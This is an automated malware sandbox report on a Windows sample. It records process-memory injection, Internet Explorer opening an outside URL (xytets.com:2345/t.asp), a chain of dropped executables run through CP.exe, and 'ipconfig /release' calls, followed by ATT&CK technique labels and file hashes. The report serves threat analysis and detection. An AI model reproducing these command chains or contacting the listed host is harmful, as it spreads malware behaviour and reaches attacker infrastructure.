PID 2468 wrote to memory of 1392	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	47
PID 2468 wrote to memory of 1392	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	47
PID 2468 wrote to memory of 1392	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	47
PID 552 wrote to memory of 2292	552	eytqljdxvq.exe	49
PID 552 wrote to memory of 2292	552	eytqljdxvq.exe	49
PID 552 wrote to memory of 2292	552	eytqljdxvq.exe	49
PID 552 wrote to memory of 2292	552	eytqljdxvq.exe	49
PID 2468 wrote to memory of 1760	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	52
PID 2468 wrote to memory of 1760	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	52
PID 2468 wrote to memory of 1760	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	52
PID 2468 wrote to memory of 1760	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	52
PID 2468 wrote to memory of 2096	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	54
PID 2468 wrote to memory of 2096	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	54
PID 2468 wrote to memory of 2096	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	54
PID 2468 wrote to memory of 2096	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	54
PID 872 wrote to memory of 3000	872	nlfdysqkic.exe	56
PID 872 wrote to memory of 3000	872	nlfdysqkic.exe	56
PID 872 wrote to memory of 3000	872	nlfdysqkic.exe	56
PID 872 wrote to memory of 3000	872	nlfdysqkic.exe	56
PID 2468 wrote to memory of 1572	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	59
PID 2468 wrote to memory of 1572	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	59
PID 2468 wrote to memory of 1572	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	59
PID 2468 wrote to memory of 1572	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	59
PID 2468 wrote to memory of 1720	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	61
PID 2468 wrote to memory of 1720	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	61
PID 2468 wrote to memory of 1720	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	61
PID 2468 wrote to memory of 1720	2468	0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe	61
PID 2760 wrote to memory of 3036	2760	lfdxvpkica.exe	63
PID 2760 wrote to memory of 3036	2760	lfdxvpkica.exe	63
PID 2760 wrote to memory of 3036	2760	lfdxvpkica.exe	63
PID 2760 wrote to memory of 3036	2760	lfdxvpkica.exe	63

C:\Users\Admin\AppData\Local\Temp\0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0a5663c35f733883fad9516026abc53a_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2468
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home8103
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2080
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2080 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2720
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\pjhcwuomyt.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:2760
- - C:\Temp\pjhcwuomyt.exe
    C:\Temp\pjhcwuomyt.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3048
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:1720
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2036
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_pjhcwuomyt.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:2432
- - C:\Temp\i_pjhcwuomyt.exe
    C:\Temp\i_pjhcwuomyt.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:264
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\rljdbwqoig.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:2040
- - C:\Temp\rljdbwqoig.exe
    C:\Temp\rljdbwqoig.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2328
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:2912
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2976
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_rljdbwqoig.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:1600
- - C:\Temp\i_rljdbwqoig.exe
    C:\Temp\i_rljdbwqoig.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\eytqljdxvq.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:1392
- - C:\Temp\eytqljdxvq.exe
    C:\Temp\eytqljdxvq.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:552
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:2292
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:3004
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_eytqljdxvq.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:1760
- - C:\Temp\i_eytqljdxvq.exe
    C:\Temp\i_eytqljdxvq.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1252
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\nlfdysqkic.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:2096
- - C:\Temp\nlfdysqkic.exe
    C:\Temp\nlfdysqkic.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:872
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:3000
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2228
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_nlfdysqkic.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:1572
- - C:\Temp\i_nlfdysqkic.exe
    C:\Temp\i_nlfdysqkic.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2752
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\lfdxvpkica.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:1720
- - C:\Temp\lfdxvpkica.exe
    C:\Temp\lfdxvpkica.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:3036
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2144
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_lfdxvpkica.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:2448
- - C:\Temp\i_lfdxvpkica.exe
    C:\Temp\i_lfdxvpkica.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2708
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\xsqkecxupj.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:2836
- - C:\Temp\xsqkecxupj.exe
    C:\Temp\xsqkecxupj.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1864
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:2576
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:1712
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_xsqkecxupj.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:620
- - C:\Temp\i_xsqkecxupj.exe
    C:\Temp\i_xsqkecxupj.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1300
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\hczusmhezx.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:2656
- - C:\Temp\hczusmhezx.exe
    C:\Temp\hczusmhezx.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1644
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:2768
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2272
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_hczusmhezx.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:1916
- - C:\Temp\i_hczusmhezx.exe
    C:\Temp\i_hczusmhezx.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2552
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\urmgezwrlj.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:2912
- - C:\Temp\urmgezwrlj.exe
    C:\Temp\urmgezwrlj.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:824
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:2040
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:1508
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_urmgezwrlj.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:2516
- - C:\Temp\i_urmgezwrlj.exe
    C:\Temp\i_urmgezwrlj.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:404
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\ojhbztomge.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:2164
- - C:\Temp\ojhbztomge.exe
    C:\Temp\ojhbztomge.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:980
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:1516
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:1900
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_ojhbztomge.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:1040
- - C:\Temp\i_ojhbztomge.exe
    C:\Temp\i_ojhbztomge.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1156
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\bztolgdysq.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:2576
- - C:\Temp\bztolgdysq.exe
    C:\Temp\bztolgdysq.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:756
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:1260
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2848
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_bztolgdysq.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:820
- - C:\Temp\i_bztolgdysq.exe
    C:\Temp\i_bztolgdysq.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2572
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\olgaysqlfd.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:1448
- - C:\Temp\olgaysqlfd.exe
    C:\Temp\olgaysqlfd.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1504
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:2268
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2260
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_olgaysqlfd.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:1232
- - C:\Temp\i_olgaysqlfd.exe
    C:\Temp\i_olgaysqlfd.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1856
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\aysqkfdxvp.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:1916
- - C:\Temp\aysqkfdxvp.exe
    C:\Temp\aysqkfdxvp.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2980
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:2328
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2984
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_aysqkfdxvp.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:2008
- - C:\Temp\i_aysqkfdxvp.exe
    C:\Temp\i_aysqkfdxvp.exe ups_ins
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\ysnkfdxspk.exe ups_run
  2⤵
  - Executes dropped EXE
  PID:1704
- - C:\Temp\ysnkfdxspk.exe
    C:\Temp\ysnkfdxspk.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2444
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      Executes dropped EXE
      PID:1144
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:1620
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_ysnkfdxspk.exe ups_ins
  2⤵
  - Executes dropped EXE
  PID:2776
- - C:\Temp\i_ysnkfdxspk.exe
    C:\Temp\i_ysnkfdxspk.exe ups_ins
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2192
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\kicxupnhcz.exe ups_run
  2⤵
  PID:1528
- - C:\Temp\kicxupnhcz.exe
    C:\Temp\kicxupnhcz.exe ups_run
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:692
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      PID:1536
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2084
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_kicxupnhcz.exe ups_ins
  2⤵
  PID:2020
- - C:\Temp\i_kicxupnhcz.exe
    C:\Temp\i_kicxupnhcz.exe ups_ins
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1544
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\aupmhfzurm.exe ups_run
  2⤵
  PID:2540
- - C:\Temp\aupmhfzurm.exe
    C:\Temp\aupmhfzurm.exe ups_run
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1748
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      PID:984
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:1692
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_aupmhfzurm.exe ups_ins
  2⤵
  PID:884
- - C:\Temp\i_aupmhfzurm.exe
    C:\Temp\i_aupmhfzurm.exe ups_ins
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2956
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\xrmcwuojgb.exe ups_run
  2⤵
  PID:2752
- - C:\Temp\xrmcwuojgb.exe
    C:\Temp\xrmcwuojgb.exe ups_run
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1572
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      PID:2952
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2304
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_xrmcwuojgb.exe ups_ins
  2⤵
  PID:1860
- - C:\Temp\i_xrmcwuojgb.exe
    C:\Temp\i_xrmcwuojgb.exe ups_ins
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2756
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\jecwrojgbv.exe ups_run
  2⤵
  PID:2708
- - C:\Temp\jecwrojgbv.exe
    C:\Temp\jecwrojgbv.exe ups_run
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2884
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      PID:1640
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2924
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_jecwrojgbv.exe ups_ins
  2⤵
  PID:1328
- - C:\Temp\i_jecwrojgbv.exe
    C:\Temp\i_jecwrojgbv.exe ups_ins
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1092
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\wrljdbvqoi.exe ups_run
  2⤵
  PID:2348
- - C:\Temp\wrljdbvqoi.exe
    C:\Temp\wrljdbvqoi.exe ups_run
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2804
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      PID:804
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2900
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_wrljdbvqoi.exe ups_ins
  2⤵
  PID:2028
- - C:\Temp\i_wrljdbvqoi.exe
    C:\Temp\i_wrljdbvqoi.exe ups_ins
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\jdbvqnigav.exe ups_run
  2⤵
  PID:2572
- - C:\Temp\jdbvqnigav.exe
    C:\Temp\jdbvqnigav.exe ups_run
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:820
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      PID:652
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:2768
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_jdbvqnigav.exe ups_ins
  2⤵
  PID:1560
- - C:\Temp\i_jdbvqnigav.exe
    C:\Temp\i_jdbvqnigav.exe ups_ins
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1448
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\dbvqnigavs.exe ups_run
  2⤵
  PID:2508
- - C:\Temp\dbvqnigavs.exe
    C:\Temp\dbvqnigavs.exe ups_run
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2156
  - - C:\temp\CP.exe
      C:\temp\CP.exe C:\windows\system32\ipconfig.exe /release
      4⤵
      PID:2196
    - - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        5⤵
        Gathers network information
        
        PID:1856
- C:\temp\CP.exe
  C:\temp\CP.exe C:\Temp\i_dbvqnigavs.exe ups_ins
  2⤵
  PID:1532
- - C:\Temp\i_dbvqnigavs.exe
    C:\Temp\i_dbvqnigavs.exe ups_ins
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Temp\eytqljdxvq.exe

Filesize
112KB

MD5
39d67063758031df407fd93fcd88eba2

SHA1
151ab5863142275d5c8ca4252992a2e3ad295eaf

SHA256
27a0b85e4ef7121f86e0e306d0e5c14243588a9439ef1bc8392dd842fe9b64b9

SHA512
c87317ef357696ad3d1d4350e3a692a2f4fe0faa86c54acc70b27ea77bccdac9f87aa61f528b0c0a3bd790201d404d36e812a2b3362144298c0d9fba7defc576

Download Submit
C:\Temp\hczusmhezx.exe

Filesize
112KB

MD5
e00a74a02b0ca2090a60332f4c3a669b

SHA1
1edce9cdee27a50f562b2b09867c9384e88d4479

SHA256
91620a05fa52581af3552bd25f5dc94052c530629e3b7d5183ef83fe7d8a0ec8

SHA512
7cff3a3d433f48001563a154f9e06d987ef6d24508d09cc093c2b19b4b432587eb320ccf618add0f54dff7c4d9c2c7acb2e1730d3cd14a220bb83b7eb60bbf19

Download Submit
C:\Temp\i_eytqljdxvq.exe

Filesize
112KB

MD5
b3fd4260c7c67cceaae11ede75102923

SHA1
eb29ea217933fb9d2c46956a717f354f6409fc9c

SHA256
40d557363e55f99beef0caba1584af85075fb657562d5fbd4af981ddd0a992f9

SHA512
9a5bd8e8797fef6587bdf140d31a9dcaf13b870fd23a9ec82d876611b8c23cdac2c7f9dd6ae5cb3f654ceb3761300df1b0b904c3154cb1644e1be464863bc2d7

Download Submit
C:\Temp\i_hczusmhezx.exe

Filesize
112KB

MD5
4a947bbfd5d227dd018cbaeb36e42e8c

SHA1
83ca7fb39c6385f3e956e1fb29bb683ff9746c73

SHA256
25b3a8353c958e2f8e297835be4f45692a620b1fbaf94fa5dff1ebc2e4410c0c

SHA512
e2bc384914db230ec1fa79de6a6c5fba3325cb3b60dc7da08083eff0902ad3dcacf1254752f243369efa062a66edf6c617fe37e4d161ad61839cd99466c5f506

Download Submit
C:\Temp\i_lfdxvpkica.exe

Filesize
112KB

MD5
56fe21d2d9f71b72ba477f5404cea678

SHA1
b90eb3401781c18879d3461a2739dfde304f105a

SHA256
5379b81beb3b21d37fd674ecd278acefb4c89e2c4af19966756f277b8c0209f1

SHA512
2c0c7484eaad9d81885832b4c72a218ee09f929f9f603aa7e01f9c60bc74a965f2f40e4439a29d69a5cfc9ea206302269f52d47e478e276532b2dc6aef89c627

Download Submit
C:\Temp\i_nlfdysqkic.exe

Filesize
112KB

MD5
8d6407003926a96c8d5966be77ceea72

SHA1
05c1cf0145e0cca8cb2b43c9110f6174216e1a4d

SHA256
96bd140ad5ece9ccafafbec2c5cd9edb6c37bcb9e02a84c0c8ee19790d0f33ce

SHA512
4f765617baf74f6af59918ada5245b61b633d8df294ff02bc2ff139376fc459075da4006423182d29b58ae4c3cf6dbc7c5592f7367b1ad9d62015f04d827f1e2

Download Submit
C:\Temp\i_pjhcwuomyt.exe

Filesize
112KB

MD5
8cf951b2b8b161ca5e2ede96cf1cc3ab

SHA1
963fd461ba13704f5c36dc2cbba6f3ebc90e6e4c

SHA256
c0289a4c6dbb0254ff4e4e1eee1f071c0c4ab154a7a62ae15827922af4b4e4bb

SHA512
e476ddaa940831f6b71e2514edec5d153684e3b5e4e902ffe787dd63bf3c03fb2684edba2ea8f6097272690ffc958955048fe3a023d58f43403da837a3771a58

Download Submit
C:\Temp\i_rljdbwqoig.exe

Filesize
112KB

MD5
20d895224dd1ea0fa1925ec8d5125d09

SHA1
8ae029d88cac9fe4486d0d71b90fd0ba31714339

SHA256
514537ae81e7234fde363e3e4c78cf189c4a92be1b52aa9bef2e8c542f3f381f

SHA512
b9d5dd7655a32fb3191064ac3823f9c308e4c7174e1b16b654b7cc6fe75e818b9835b66dcaef621cbfe0a79ebc95211dc2220692daf4b6adc49c1169071e9ef2

Download Submit
C:\Temp\i_xsqkecxupj.exe

Filesize
112KB

MD5
82c8d7fa86738aa9796c3a4d655e7373

SHA1
110a0a0b5d41e4b6ce1a689a6be05a4598142cef

SHA256
fb75b75721b3fc4c21e8383fa0064a8f50861a21f3f35b60b766802ee8f9e157

SHA512
1bb528fea02568b2734ea7c64403c11d2eaede79281b5c92aaf89bd813fc6ee02204ab206f7ae08d6629c0fdede528e6be564566210504271f09489062541e38

Download Submit
C:\Temp\lfdxvpkica.exe

Filesize
112KB

MD5
0a25730760257b1041f90a8c4c5d6ead

SHA1
8079719a2d34f7536b12195aa4338631c0d1ba9e

SHA256
040b06556a13335d1642de4dacf697cf0f1f392f8d1096906b5ee296ebba1cba

SHA512
519fd1d3cfd73bdcd040d1b1207d8523d5153b8e264dff777d2c004c6be4eb3d908ea160dc74899d35f4af3762c1872fccbb593bf5133fb2fe9487cabef19857

Download Submit
C:\Temp\nlfdysqkic.exe

Filesize
112KB

MD5
47352b7efb019f674e801e9e5ba13362

SHA1
46feea993769bfc3bae4dd6e02fa3a09fb8dbb6f

SHA256
82af9800e2be36136fbfd37edebae8c8fa6dfb1471bfa849ea14af7a2f919c61

SHA512
d09eb147974984195d3e61d7aeb194b94304eb4f4fba93716297fdf19ed42baa1fbfc635fba839db953a51b2c3d92077fb5d048170cae152d4907ac2bdf27fa3

Download Submit
C:\Temp\pjhcwuomyt.exe

Filesize
112KB

MD5
aec37755deeda813133accce854b6f6d

SHA1
b5c3b2477feb29c97e9fe5d8088efeaaddd0c8ce

SHA256
0ed243d1e9aa07d759c82cf6b5f873b45c1e13ee1cdb51d04771766f3796e1ab

SHA512
c931fd1187bb54eb47ca79a7e72b0392866fc41c5caf8a8e47aa4744727751cae96a2a13184e11b0aae6e71c69a733ce988f256c454b80838ec2c070f9d1bb0a

Download Submit
C:\Temp\rljdbwqoig.exe

Filesize
112KB

MD5
2c7547828f5b0fb1707ca953edc303a8

SHA1
eb70317fccf121ce6cb4294ac80c3a53fb47f2b0

SHA256
ad5c9c08fe203a22f124f312d960ca21d152c5e144a6d85cb8637b091b47b216

SHA512
ece8af2e386e7d8cfe91ab376c0dbdf90f5c15abb0d386da16b9b1f4e0f332bbc3d3af38d96f40385f3eeefb49ff81921a24aea21d9199ceb626952565fd4822

Download Submit
C:\Temp\urmgezwrlj.exe

Filesize
112KB

MD5
e92b87f1beaf6c5a0eb0fefb6aa9775a

SHA1
4d0564390f5ab2b9a5d660916dbb8f10f1a1a852

SHA256
053b5c9262bf29ebed0b2182b7183e86393258302dbcb4bf1e843c62713acd0c

SHA512
2d0571a9d0059bd28a5bc111830f2257f5feaa94b72893cda9fcd48db37317d8040fedea2d3a7105b13993218d26796268c10bac638eb5e0f70a3632f545f23c

Download Submit
C:\Temp\xsqkecxupj.exe

Filesize
112KB

MD5
b1c9f0c2c4b5a457be75318360de6f6b

SHA1
4405564d781cf2f247a394eaeda43c663ca433cb

SHA256
8a4a0b0c8b5d787a3b8f683a474ec3f0707f4ca6d771cef439e9d9b743a659f3

SHA512
